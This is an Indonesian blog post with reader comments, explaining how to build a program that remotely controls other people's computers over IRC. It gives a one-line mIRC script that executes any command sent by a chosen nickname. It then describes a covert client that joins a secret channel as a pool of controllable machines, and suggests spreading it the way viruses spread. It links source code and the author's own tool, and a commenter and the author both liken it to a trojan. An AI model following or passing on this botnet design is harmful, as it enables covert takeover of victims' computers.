Oleh: sanjisan | Mei 24, 2009

Membuat Program Untuk Mengendalikan Komputer Jarak Jauh


Ternyata ada gunanya juga belajar mIRC Scripting selama lebih dari 8 tahun. Tidak hanya sekedar kemampuan dalam “bermain” scripts, tapi ada yang lebih dari itu, yaitu menambah “bahan-bahan” dalam menemukan hal-hal baru.

Kalau dalam dunia mIRC Scripting, kita bisa membuat script yang dapat digunakan untuk mengendalikan komputer seseorang menggunakan komputer kita. Caranya adalah dengan memasukkan script semacam ini ke dalam program mIRC pada komputer target (yang ingin dikendalikan).

Inilah contoh scriptnya:
on *:text:san *:?: if ($nick == Sanji) $2-

Maksudnya adalah, jika ada seseorang yang mengirim private message yang diawali dengan kata “san” dan dilanjutkan dengan command (perintah) tertentu, maka komputer yang dipasangi script tersebut akan melakukan perintah itu.

Perintah apa saja akan dilakukannya, entah itu perintah untuk shutdown, restart, buka web, kirim file, download file, memutar mp3, dan sebagainya. Dan hanya nick “Sanji” yang bisa mengendalikan komputer tersebut :)

Tapi…
Namanya juga mIRC Script, jadi “hanya” bisa digunakan saat komputer target menjalankan program mIRC dan konek ke server tertentu. Dan si pengendali juga “harus” konek ke server yang sama, agar bisa bertemu dan mengendalikannya.

Karena…
– Script ini tidak akan berlaku jika komputer target tidak menjalankan mIRC.
– Cara memasukkan ke mIRC di komputer target tentu agak merepotkan.
– Juga bisa ketahuan jika dikirimnya melalui private message (pv-an).

Maka…
Satu-satunya cara paling mudah adalah dengan membuat program sendiri, program inilah yang berfungsi sebagai pengganti mIRC. Yaitu untuk melakukan koneksi ke server irc tertentu dan masuk ke #Channel rahasia kita. Nickname dia bisa kita setting “random” atau “memiliki aturan tertentu“.

Pastikan bahwa tidak ada orang lain yang tahu tentang #channel rahasia ini. Dengan begitu, jika ada nick-nick yang masuk ke #channel ini, berarti itu adalah komputer yang siap untuk dikendalikan.

Cara menyebarkannya?
Ini tergantung kemampuan kita dalam menjalankan “bisnis” ini. Ide-ide bisa dengan mudah kita temukan jika “mau” melihat cara kerja (penyebaran) virus.

Bagi yang suka VB, anda bisa mendapatkan Source Code “simple irc client” (pengganti mIRC) di sini, dan download juga Winsock Control di sini.

Tidak selalu “hanya” untuk keburukan…

Dengan cara yang sama, kita bisa “menghubungkan” antara komputer rumah dengan komputer di kantor, sehingga tidak perlu bolak-balik kesana-kemari jika jaraknya cukup jauh.

Bisa juga ditambahkan pada “Virus Anti Pornografi” agar bisa dikendalikan untuk meng-update database situs2 porno untuk diblokir, dan sebagainya.

Contoh aplikasi buatan saya bisa anda download di sini ^_^

Sanji
Founder of #Kudus @irc.allnetwork.org
annaufal_at_yahoo_dot_com


Responses

  1. Waduh,… untuk program sya masih blom bisa. Tapi tulisannya bisa jadi acuan. Tks

  2. terimaksih..aku jadi sedikit ngeh…

  3. kunjungan pagi :D

    langsung disedodh ahhh programnya..

  4. Bagus mas yang IRC savvy,
    Saya tidak lagi suka maen di MIRC. hehe
    Add blog saya mas, sebagai satu blog seorang yang udah berusia dan prihatin terhadap hubungan Indo-malay.

    dinsmann

  5. Wow…tambah ilmu nih, Thanks ya :)

  6. makash y kk… atas informasi na… mksh juga kk dh kasih ilmu na sikit

  7. Tahnks…jadi tambah ilmu neh…!!

  8. wah program ini cara pakenya gimana nih?
    kalo diperhatikan lebih mirip trojan horse

  9. @android2009,
    Ya betul, memang mirip trojan horse, karena dia bekerja sendiri, seharusnya dikasih teman biar bisa saling bantu-membantu :)

  10. […] Inilah rahasia hacking ATM, penipuan, rahasia hacking ATM, scam, trik hacking mesin ATM « Membuat Program Untuk Mengendalikan Komputer Jarak Jauh Cara Keren Hacking Yahoo! Mail » Ditulis oleh mualafguntara Disimpan di 1 Leave a Comment […]

  11. itu semua dah pasti bisa?log gitu q coba n q pelajari untuk pengembangan diri aja dan pengalaman coz pengalamat tu mahal!tahnsk …brow

  12. Trima kasih..
    Sangat bermanfaat sekali buat saya.
    Salam kenal yah?

  13. Ga berani download, jangan-jangan malah kompiuter kita yang mau diakalin

  14. bisa gax kalau kmu krim totorialnya ke saya
    karena saya tertarik mempelajarinya


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Kategori

%d blogger menyukai ini: